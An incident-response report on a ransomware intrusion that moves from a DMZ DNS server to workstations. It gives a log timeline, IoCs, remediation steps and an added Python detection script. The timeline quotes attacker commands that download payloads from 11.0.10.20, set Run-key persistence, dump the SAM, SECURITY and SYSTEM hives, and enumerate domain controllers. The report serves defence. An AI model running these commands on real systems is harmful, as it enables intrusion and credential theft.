# Team 2 - Incident "Achilles"
Severity: High
# Executive Summary
On the 19th of April, the external internet-facing DNS server was compromised and a threat actor moved laterally into the internal network, which led to workstations having their files encrypted.
The IR team identified how the attacker compromised the infrastructure thanks to the logs at our disposal and remediated the incident accordingly.
Multiple assets were affected, but the greatest impact is the files that were encrypted on the 5 workstations listed in this report.
# Recommendation
The IR team recommends the following course of action:
- Block and detect the IoCs reported in the dedicated section;
- Restrict SSH (or any remote control) access from every exposed internet service;
- Restrict network access rules (firewall) from the DMZ to the internal network;
- Install an EDR solution to block infection attempts;
- Block login attempts using IP/geolocation restrictions.
# Timeline (incident details)
**2023-04-19 06:33** - Threat Actor connects to the external DNS server (nsdmz) using `suzan.paulson` over ssh
**2023-04-19 06:37** - Threat Actor compromises `nsdmz` and downloads a payload:
`sh -c curl --insecure https://11.0.10.20/getFile/Exaramel-Linux -o centreon_module_linux_app64`
**2023-04-19 06:45** - From `nsdmz`, the Threat Actor moves laterally to `hqws1005`
**2023-04-19 06:45:36.389** - hqws1005.commensurate.tech - System - File created - `C:\Windows\wsmprovav.exe`
**2023-04-19 06:47** - The threat actor connected to the DC using the account `suzan.paulson` (EventID 4624, logon type 3).
**2023-04-19 06:47:15.874** - hqws1005.commensurate.tech - System - File created - `C:\Windows\DvLTdOwB.exe`
**2023-04-19 06:47:15.953** - hqws1005.commensurate.tech - Registry value - `HKLM\System\CurrentControlSet\Services\Windows Check AV\ImagePath - %%systemroot%%\DvLTdOwB.exe`
**2023-04-19 06:47:15.987** - hqws1005.commensurate.tech - Process Create - `C:\Windows\DvLTdOwB.exe`
**2023-04-19 06:47:16.399** - hqws1005.commensurate.tech - DvLTdOwB.exe - Process Create - `cmd.exe`
**2023-04-19 06:48:04.129** - hqws1005.commensurate.tech - reg.exe - Process Create - `ADD HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run /t REG_EXPAND_SZ /v SecurityHealth /d "C:\Windows\wsmprovav.exe http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll"`
**2023-04-19 06:48:04.121** - hqws1005.commensurate.tech - reg.exe - Registry Set - HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth => `C:\Windows\wsmprovav.exe http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll`
**2023-04-19 07:31:53.786** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `"C:\Windows\wsmprovav.exe" http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll`
**2023-04-19 07:31:54.811** - hqws1005.commensurate.tech - File created - `C:\Users\suzan.paulson\AppData\Local\Microsoft\Windows\INetCache\IE\LNK9953E\wsmprovav[1].dll`
**2023-04-19 07:31:54.930** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `C:\Windows\system32\cmd.exe /c rundll32.exe C:\Windows\wsmprovav.dll,Start`
**2023-04-19 07:31:54.940** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `rundll32.exe C:\Windows\wsmprovav.dll,Start`
**2023-04-19 07:50:57.215** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - cmd.exe - Process Create - `cmd.exe /k C:\Windows\System32\oradump.exe`
**2023-04-19 07:50:31.905** - hqws1005.commensurate.tech - File created - `C:\Windows\System32\oradump.exe`
**2023-04-19 07:50:57.377** - hqws1005.commensurate.tech - File created - `C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\python39.dll`
**2023-04-19 07:50:57.377** - hqws1005.commensurate.tech - File created - `C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libssl-1_1.dll`
**2023-04-19 07:50:57.408** - hqws1005.commensurate.tech - File created - `C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\sqlite3.dll`
...
**2023-04-19 07:50:57.446** - hqws1005.commensurate.tech - Process Create - `C:\Windows\System32\oradump.exe`
**2023-04-19 07:50:57.669** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\sam C:\Users\SUZAN~1.PAU\AppData\Local\Temp\brmirn"`
**2023-04-19 07:50:57.840** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\security C:\Users\SUZAN~1.PAU\AppData\Local\Temp\lyniegk"`
**2023-04-19 07:50:57.876** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\system C:\Users\SUZAN~1.PAU\AppData\Local\Temp\rbmhrzgnm"`
**2023-04-19 07:50:57.876** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c C:\Windows\system32\cmd.exe /c "ver"`
**2023-04-19 07:53:01.572** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\system C:\Users\SUZAN~1.PAU\AppData\Local\Temp\rbmhrzgnm"`
**2023-04-19 07:50:57.876** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "C:\Windows\System32\mslog.exe -o C:\Windows\System32\mslog.txt"`
**2023-04-19 08:07:03.668** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "taskkill /F /IM mslog.exe"`
**2023-04-19 08:07:33.994** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "nltest /dclist:commensurate"`
**2023-04-19 08:08:48.921** - hqws1005.commensurate.tech - Process Create - `cmd.exe /k "del /Q C:\Windows\System32\oradump.exe C:\Windows\System32\mslog.exe C:\Windows\System32\mslog.txt"`
**2023-04-19 08:17** - The threat actor connects to the DC using Suzan Paulson's domain admin account (`suzanpaulson-da`) over RDP
**2023-04-19 08:27** - Encryption occurs on the following workstations:
```
**2023-04-19 08:25:20.980** - hqws1001.commensurate.tech - File Created - C:\Users\Default\Desktop\Statistics_DouEhb.xlsx.crypt
...
**2023-04-19 08:26:01.544** - hqws1002.commensurate.tech - File Created - C:\Users\Default\Desktop\Notes_xYfcWx.doc.crypt
...
**2023-04-19 08:26:43.982** - hqws1003.commensurate.tech - File Created - C:\Users\Default\Desktop\Statistics_DouEhb.xlsx.crypt
...
**2023-04-19 08:27:29.933** - hqws1004.commensurate.tech - File Created - C:\Users\Default\Desktop\Statistics_DouEhb.xlsx.crypt
...
**2023-04-19 08:27:33.603** - hqws1005.commensurate.tech - File Created - C:\Users\Default\Desktop\Notes_xYfcWx.doc.crypt
...
```
**2023-04-19 08:28** - Threat Actor clears the logs (EventID 1102) on the DC
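As an added example (not part of the IR team's report or tooling), the following Python script turns the behaviours seen in this timeline into detection rules and runs them over timeline-style log lines; the regexes, the `Hit` type and the `SAMPLE` list are this example's own, and the sample mixes entries copied from the timeline above with one constructed benign entry.

```python
import re
from dataclasses import dataclass

# Behaviour and IoC patterns derived from the "Achilles" timeline.
# These regexes are this example's own, not the IR team's tooling.
RULES = {
    "reg_save_hive": re.compile(r"reg(?:\.exe)?\s+save\s+hklm\\(?:sam|security|system)\b", re.I),
    "run_key_persistence": re.compile(r"\\CurrentVersion\\Run\\\w+", re.I),
    "service_imagepath": re.compile(r"\\CurrentControlSet\\Services\\[^\\]+\\ImagePath", re.I),
    "rundll32_export_call": re.compile(r"rundll32(?:\.exe)?\s+\S+\.dll,\w+", re.I),
    "dc_enumeration": re.compile(r"\bnltest\s+/dclist:", re.I),
    "c2_address": re.compile(r"\b11\.0\.10\.20\b"),
}
# Timeline entry layout used in this report: **timestamp** - host - details
ENTRY = re.compile(r"^\*\*(?P<ts>[\d-]+ [\d:.]+)\*\*\s+-\s+(?P<host>\S+)\s+-\s+(?P<rest>.*)$")

@dataclass
class Hit:
    ts: str
    host: str
    rules: tuple

def classify(line):
    """Return a Hit for a timeline line that trips at least one rule, else None."""
    m = ENTRY.match(line.strip())
    if not m:
        return None  # narrative entries without a host field are skipped
    matched = tuple(name for name, rx in RULES.items() if rx.search(m["rest"]))
    return Hit(m["ts"], m["host"], matched) if matched else None

def scan(lines):
    return [h for h in map(classify, lines) if h]

def hosts_with_full_chain(hits):
    """Hosts where persistence, hive dumping and DC enumeration were all observed."""
    need = {"run_key_persistence", "reg_save_hive", "dc_enumeration"}
    seen = {}
    for h in hits:
        seen.setdefault(h.host, set()).update(h.rules)
    return {host for host, rules in seen.items() if need <= rules}

# Constructed sample: five entries copied from the timeline above plus one benign entry.
SAMPLE = [
    r"**2023-04-19 06:47:15.953** - hqws1005.commensurate.tech - Registry value - `HKLM\System\CurrentControlSet\Services\Windows Check AV\ImagePath - %%systemroot%%\DvLTdOwB.exe`",
    r"**2023-04-19 06:48:04.121** - hqws1005.commensurate.tech - reg.exe - Registry Set - HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth => `C:\Windows\wsmprovav.exe http://11.0.10.20:8080/getFile/wsmprovav.dll C:\Windows\wsmprovav.dll`",
    r"**2023-04-19 07:31:54.940** - hqws1005.commensurate.tech - HQWS1005\suzan.paulson - Process Create - `rundll32.exe C:\Windows\wsmprovav.dll,Start`",
    r'**2023-04-19 07:50:57.669** - hqws1005.commensurate.tech - oradump.exe - `cmd.exe /c "reg.exe save hklm\sam C:\Users\SUZAN~1.PAU\AppData\Local\Temp\brmirn"`',
    r'**2023-04-19 08:07:33.994** - hqws1005.commensurate.tech - rundll32.exe C:\Windows\wsmprovav.dll,Start - Process Create - `cmd.exe /k "nltest /dclist:commensurate"`',
    r"**2023-04-19 09:00:00.000** - hqws1002.commensurate.tech - explorer.exe - Process Create - `notepad.exe C:\Users\bob\notes.txt`",  # benign, constructed
]
```

Calling `scan(SAMPLE)` yields one hit per malicious entry, and `hosts_with_full_chain` reduces them to the single workstation on which persistence, hive dumping and DC enumeration all occurred.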
# IoCs
[IP ] 11.0.10.20
[URL ] http://11.0.10.20:8080/getFile/wsmprovav.dll
[Reg ] HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth
[Serv] HKLM\System\CurrentControlSet\Services\Windows Check AV\ImagePath
[File] C:\Windows\wsmprovav.exe (7628FF7A3F79E314D30D65EE44529A15)
[File] C:\Windows\wsmprovav.dll
[File] C:\Windows\DvLTdOwB.exe (6983F7001DE10F4D19FC2D794C3EB534)
[File] C:\Windows\System32\oradump.exe
[DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\sqlite3.dll
[DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\python39.dll
[DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libssl-1_1.dll
[DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libffi-7.dll
[DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\libcrypto-1_1.dll
[DLL ] C:\Users\SUZAN~1.PAU\AppData\Local\Temp\_MEI16642\VCRUNTIME140.dll
[Leak] C:\Windows\System32\mslog.txt
[Enc ] C:\Users\Default\Desktop\*.crypt
# Remediation steps
## Actions Taken
On the corporate firewall level, we have:
- Blocked all outbound traffic to the malicious IP `11.0.10.20`;
- Blocked all SSH traffic to the DMZ zone.
## Further actions to take
Notify the user of the issue.
Firewall:
- Block all traffic with source or destination `11.0.10.20`.
Accounts:
- Disable the two accounts Suzan Paulson / suzanpaulson-da.
On all workstations:
- hqws1001.commensurate.tech
- hqws1002.commensurate.tech
- hqws1003.commensurate.tech
- hqws1004.commensurate.tech
- hqws1005.commensurate.tech
-> Kill the processes:
- C:\Windows\wsmprovav.exe
- C:\Windows\wsmprovav.dll
- C:\Windows\DvLTdOwB.exe
- C:\Windows\System32\oradump.exe
- C:\Windows\System32\mslog.exe
-> Stop the service "Windows Check AV"
-> Remove the service "Windows Check AV"
-> Remove the files:
- C:\Windows\wsmprovav.exe
- C:\Windows\wsmprovav.dll
- C:\Windows\DvLTdOwB.exe
- C:\Windows\System32\oradump.exe
- C:\Windows\System32\mslog.exe
- C:\Windows\System32\mslog.txt
- C:\Users\SUZAN~1.PAU\AppData\Local\Temp\*
-> Remove the registry key (load the user's hive first):
- Load the hive: `reg load HKU\Username C:\Users\%username%\NTUSER.DAT`
- Remove `HKU\Temp\Software\Microsoft\Windows\CurrentVersion\Run\SecurityHealth`
- Unload the hive: `reg unload HKU\Username`
-> Remove all `.crypt` files
-> Restore the files from backup
Change the passwords of the accounts Suzan Paulson / suzanpaulson-da.
Re-enable the accounts Suzan Paulson / suzanpaulson-da.
# Next course of action
The IR team needs to perform forensic acquisition and investigate further how the attacker compromised the DC. It is still unclear how the attacker started the malware on the other workstations. But since Suzan's domain account was available, the threat actor had multiple means to deploy the malware on the other workstations and hence encrypt them.